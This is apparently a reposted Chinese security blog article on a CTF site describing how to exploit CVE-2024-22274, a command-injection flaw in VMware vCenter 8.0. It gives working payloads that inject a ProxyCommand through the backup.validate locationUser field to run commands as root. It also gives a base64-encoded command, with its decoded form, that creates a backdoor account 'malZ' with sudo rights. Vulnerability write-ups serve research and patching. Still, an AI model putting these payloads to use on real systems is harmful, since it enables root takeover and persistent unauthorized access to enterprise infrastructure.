CTF导航 CTF导航

VMware vCenter RCE CVE-2024-22274 细节公开 !

渗透技巧 1个月前 admin
119 0 0

环境:

– VMware vCenter 8.0.0.10200 

– Photon Linux

VMware vCenter RCE CVE-2024-22274 细节公开 !


首先,通过ssh以admin用户登录到vcenter 的严格模式shell

VMware vCenter RCE CVE-2024-22274 细节公开 !

通过执行“admin”用户可用的多个API命令并检查使用“pspy”调用的底层系统命令

backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=;/bin/touch /tmp/root!!! 2>' --locationPassword

VMware vCenter RCE CVE-2024-22274 细节公开 !

可见,成功创建文件,并且文件属于root用户

VMware vCenter RCE CVE-2024-22274 细节公开 !

我们可以尝试创建一个新的本地用户

backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=;/bin/bash -c "{echo,dXNlcmFkZCBtYWxaICYmIGVjaG8gLWUgIk1hbElzSGVyZTEjXG5NYWxJc0hlcmUxIyIgfCBwYXNzd2QgbWFsWiA7IHVzZXJtb2QgLXMgL2Jpbi9iYXNoIG1hbFogJiYgdXNlcm1vZCAtYUcgc3VkbyBtYWxaCg==}|{base64,-d}|bash"  ↑的base64原文  useradd malZ && echo -e "MalIsHere1#nMalIsHere1#" | passwd malZ ; usermod -s /bin/bash malZ && usermod -aG sudo malZ

VMware vCenter RCE CVE-2024-22274 细节公开 !

成功创建恶意用户,然后只需要ssh这个用户即可

VMware vCenter RCE CVE-2024-22274 细节公开 !


VMware vCenter RCE CVE-2024-22274 细节公开 !



原文始发于微信公众号(合规渗透):VMware vCenter RCE CVE-2024-22274 细节公开 !

版权声明:admin 发表于 2024年7月25日 上午9:54。
转载请注明:VMware vCenter RCE CVE-2024-22274 细节公开 ! | CTF导航

相关文章

“化学反应”:log4j JNDI fuzz 与被动扫描
admin
964
Magic In Java API 学习记录
admin
143
webshell绕过案例
admin
609
K8s 安全策略最佳实践
admin
898
原创Paper | Citrix CVE-2022-27518 漏洞分析
admin
443
Blind CSS Exfiltration: exfiltrate unknown web pages
admin
75

相关文章

Tomcat CVE-2024-21733漏洞简单复现、分析
0
每周蓝军技术推送(2024.8.31-9.6)
0
每日安全动态推送(9-6)
0
浅谈如何防止他人恶意刷接口
0
web选手入门pwn(19) ——2个字节
0
集权系列科普 | 想了解AD&攻击面?独家干货放送(下)
0
JDK高版本的模块化以及反射类加载限制绕过
0
原创 Paper | 通过杀软 avast 及 no-defender 工具分析 Windows 防护机制
0
【DEFCON & HITB】Bug Hunting In VMware Device Virtualization(上篇)
0
CVE-2024-38106 race condition 漏洞分析
0